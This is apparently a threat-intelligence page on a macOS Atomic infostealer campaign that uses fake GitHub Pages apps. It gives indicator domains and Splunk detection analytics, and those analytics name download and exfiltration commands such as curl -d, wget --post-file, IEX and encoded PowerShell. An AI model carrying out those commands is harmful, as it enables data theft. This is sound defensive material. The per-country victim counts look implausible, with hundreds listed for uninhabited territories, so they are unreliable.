Campaigns
Atomic GitHub Pages Campaign

Atomic GitHub Pages Campaign

macOSinfostealerAtomicGitHub Pages
In this campaign, attackers create fake GitHub Pages that appear to be legitimate Mac applications. They lure users in via search results and social media links. When a user pastes the terminal command, a small loader is downloaded and executed. The loader steals passwords, browser data, keychain items, and wallet files, then sends them to the attackers' servers.

Indicators of Compromise

bonoud.com
macprograms-pro.com
ahoastock825.github.io
github.com

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1204-User Execution


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Monitor logs from applications to detect user-initiated actions such as opening malicious documents, clicking on phishing links, or executing downloaded malware.

Analytic 1 - Logs showing unexpected user actions triggering unusual processes.

sourcetype=application_log EventCode=1000 OR EventCode=1001| search application IN ("winword.exe", "excel.exe", "chrome.exe", "firefox.exe", "adobe.exe", "zip.exe")| stats count by application event_description| where event_description IN ("opened document", "clicked link", "executed file")

DS0017

Command

Command Execution

Detect commands triggered by users, especially related to decompression tools (e.g., zip files) that may unpack malicious payloads. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.

Analytic 1 - Command lines showing decompression or decoding actions.

sourcetype=WinEventLog:Powershell EventCode=4104| search process_name IN ("powershell.exe", "cmd.exe", "zip.exe", "winrar.exe")| stats count by process_name command_line user| where command_line LIKE "%unzip%" OR command_line LIKE "%decode%"

DS0032

Container

Container Creation

Monitor for newly constructed containers that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

Analytic 1 - Containers communicating with unexpected external services.

sourcetype=container_creation OR sourcetype=container_start| stats count by container_name event_description user| where container_name NOT IN ("") AND event_description IN ("created", "started")



Container Start

Monitor for the activation or invocation of a container (ex: docker start or docker restart)

DS0022

File

File Creation

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

DS0007

Image

Image Creation

Monitor for newly constructed image that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

DS0030

Instance

Instance Creation

Monitor for newly constructed instances that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.



Instance Start

Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)

DS0029

Network Traffic

Network Connection Creation

Monitor network traffic patterns associated with web-based user actions, such as clicking on phishing links or executing malware that tries to establish C2 communication.

Analytic 1 - Web-based network connections to suspicious destinations.

sourcetype=sysmon EventCode=3| search process_name IN ("winword.exe", "chrome.exe", "firefox.exe") | stats count by src_ip dest_ip dest_port process_name| where dest_ip NOT IN ("")



Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).

DS0009

Process

Process Creation

Identify processes spawned by user actions, especially from Office documents, PDFs, or web browsers that could lead to malicious execution.

Analytic 1 - Processes created from user interaction with files.

((sourcetype=WinEventLog:Security EventCode=4688) OR (sourcetype=Sysmon EventCode=1))| search parent_process IN ("winword.exe", "excel.exe", "chrome.exe", "firefox.exe")| stats count by parent_process process_name command_line user| where process_name NOT IN ("chrome.exe", "firefox.exe", "winword.exe", "excel.exe")


T1059-Command and Scripting Interpreter


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

Analytic 1 - Suspicious script execution

(sourcetype=WinEventLog:Security OR OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)| search Image IN ("bash", "sh", "cmd", "powershell", "python", "java", "perl", "ruby", "node", "osascript", "wmic")| eval suspicious_cmds=if(like(command_line, "%Invoke-Obfuscation%") OR like(command_line, "%-EncodedCommand%") OR like(command_line, "%IEX%") OR like(command_line, "%wget%") OR like(command_line, "%curl%"), "Yes", "No")

DS0011

Module

Module Load

Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).

Analytic 1 - Look for unusual module loads associated with scripting languages.

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational| search EventCode=7 ImageLoaded IN ("C:\Windows\System32\JScript.dll", "C:\Windows\System32\vbscript.dll", "System.Management.Automation.dll")

DS0009

Process

Process Creation

Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.

Analytic 1 - Look for unusual command and scripting process creation.

(sourcetype=WinEventLog:Security OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)(EventCode=4688 OR EventID=1 OR _raw=sh OR _raw=python OR _raw=powershell OR _raw=cmd OR _raw=script OR _raw=wscript OR _raw=bash)



Process Metadata

Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[59]

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Look for attempts to enable scripts on the system.

index=windows (EventCode=1 OR EventCode=4688 OR EventCode=4103 OR EventCode=4104) (CommandLine="script")| search script_name IN (".ps1", ".sh", ".py", ".rb", ".js", ".vbs")| eval suspicious_script=if(like(script_name, "%.sh") AND hour(_time) NOT BETWEEN 8 AND 18, "Yes", "No")| where suspicious_script="Yes"


T1005-Data from Local System


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.

DS0022

File

File Access

Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases. On ESXi servers, this may include .vmdk and .vmsn files in the /vmfs/volumes directory.

DS0009

Process

OS API Execution

Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.



Process Creation

Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.


T1041-Exfiltration Over C2 Channel


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may steal data by exfiltrating it over an existing command and control channel.

Analytic 1 - Detecting C2 Tool Execution Related to Exfiltration

(EventCode=1 OR source="/var/log/audit/audit.log" type="execve")| where (command IN ("powershell -enc", "python -c", "curl -d", "wget --post-file", "certutil -encode", "base64 -w 0"))| eval risk_score=case( command IN ("powershell -enc", "certutil -encode"), 9, command IN ("python -c", "curl -d"), 8)| where risk_score >= 8| stats count by _time, host, user, command, risk_score

DS0022

File

File Access

Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.

Analytic 1 - Detecting File Access Before C2 Exfiltration

(EventCode=11 OR EventCode=4663 OR source="/var/log/audit/audit.log" type="open")| where (file_path IN ("/tmp/", "/var/tmp/", "/home//Downloads/", "C:\Users\\Documents\exfil"))| eval risk_score=case( file_path IN ("/tmp/", "/var/tmp/"), 9, file_path IN ("/home//Downloads/*"), 8)| where risk_score >= 8| stats count by _time, host, user, file_path, risk_score

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on TCP network connection creation.

Analytic 1 - Detecting Outbound Network Connections for C2 Exfiltration

(EventCode=3 OR source="zeek_conn.log" OR source="firewall_logs")| where (bytes_out > 1000000 AND bytes_out > bytes_in * 5) // High outbound traffic| bucket span=1h _time| stats count by _time, host, process, dest_ip, bytes_out| where count > 5| stats count by host, dest_ip, count, earliest(_time), latest(_time)| where count >= 5| eval risk_score=case( count >= 10, 9, count >= 5, 8)| where risk_score >= 8| table host, dest_ip, count, earliest, latest, risk_score



Network Traffic Content

Hidden or encoded data inside normal C2 traffic (e.g., Base64, XOR, custom encoding).HTTP/S payloads with unusual long strings in GET/POST requests.DNS tunneling techniques used to bypass security controls.

Analytic 1 - Detecting Encoded or Hidden Data in C2 Channels

(EventCode=3 OR source="zeek_http.log" OR source="dns.log")| where (uri_length > 200 OR request_body_length > 5000)| eval encoded_data=if(match(uri, "([A-Za-z0-9+/=]{100,})") OR match(request_body, "([A-Za-z0-9+/=]{100,})"), 1, 0)| where encoded_data=1| stats count by _time, host, user, uri, request_body_length, risk_score| eval risk_score=case( request_body_length > 10000, 9, request_body_length > 5000, 8)| where risk_score >= 8| table host, uri, request_body_length, risk_score



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious

Observed Countries250

AD (745)
AE (152)
AF (846)
AG (281)
AI (125)
AL (402)
AM (171)
AO (920)
AQ (543)
AR (605)
AS (518)
AT (754)
AU (298)
AW (6)
AX (581)
AZ (15)
BA (618)
BB (414)
BD (918)
BE (491)
BF (588)
BG (325)
BH (434)
BI (435)
BJ (149)
BL (789)
BM (601)
BN (217)
BO (673)
BQ (398)
BR (304)
BS (965)
BT (143)
BV (862)
BW (172)
BY (911)
BZ (19)
CA (232)
CC (972)
CD (312)
CF (315)
CG (857)
CH (722)
CI (706)
CK (134)
CL (314)
CM (818)
CN (237)
CO (906)
CR (498)
CU (895)
CV (105)
CW (424)
CX (343)
CY (888)
CZ (368)
DE (128)
DJ (913)
DK (414)
DM (440)
DO (332)
DZ (803)
EC (669)
EE (365)
EG (632)
EH (979)
ER (925)
ES (870)
ET (465)
FI (807)
FJ (96)
FK (848)
FM (149)
FO (127)
FR (983)
GA (883)
GB (871)
GD (898)
GE (821)
GF (900)
GG (579)
GH (53)
GI (769)
GL (686)
GM (660)
GN (369)
GP (319)
GQ (310)
GR (1)
GS (413)
GT (66)
GU (13)
GW (327)
GY (791)
HK (184)
HM (544)
HN (946)
HR (538)
HT (235)
HU (760)
ID (767)
IE (605)
IL (317)
IM (802)
IN (53)
IO (649)
IQ (551)
IR (531)
IS (174)
IT (654)
JE (957)
JM (475)
JO (202)
JP (885)
KE (688)
KG (332)
KH (246)
KI (467)
KM (570)
KN (389)
KP (728)
KR (270)
KW (684)
KY (470)
KZ (929)
LA (789)
LB (524)
LC (654)
LI (752)
LK (612)
LR (730)
LS (915)
LT (947)
LU (434)
LV (510)
LY (991)
MA (113)
MC (257)
MD (973)
ME (698)
MF (675)
MG (521)
MH (444)
MK (781)
ML (166)
MM (504)
MN (922)
MO (458)
MP (303)
MQ (803)
MR (510)
MS (419)
MT (43)
MU (68)
MV (248)
MW (104)
MX (246)
MY (594)
MZ (514)
NA (415)
NC (405)
NE (616)
NF (513)
NG (889)
NI (773)
NL (713)
NO (702)
NP (491)
NR (448)
NU (674)
NZ (466)
OM (662)
PA (822)
PE (648)
PF (619)
PG (545)
PH (421)
PK (187)
PL (905)
PM (913)
PN (439)
PR (465)
PS (120)
PT (231)
PW (892)
PY (185)
QA (958)
RE (746)
RO (275)
RS (488)
RU (132)
RW (517)
SA (62)
SB (612)
SC (959)
SD (194)
SE (933)
SG (851)
SH (876)
SI (132)
SJ (449)
SK (261)
SL (41)
SM (270)
SN (570)
SO (786)
SR (146)
SS (646)
ST (150)
SV (746)
SX (948)
SY (439)
SZ (927)
TC (660)
TD (580)
TF (372)
TG (174)
TH (737)
TJ (426)
TK (226)
TL (450)
TM (801)
TN (378)
TO (169)
TR (359)
TT (847)
TV (732)
TW (587)
TZ (489)
UA (836)
UG (569)
UM (568)
US (671)
UY (204)
UZ (671)
VA (938)
VC (205)
VE (243)
VG (362)
VI (341)
VN (334)
VU (159)
WF (36)
WS (993)
XK (897)
YE (129)
YT (470)
ZA (693)
ZM (768)
ZW (79)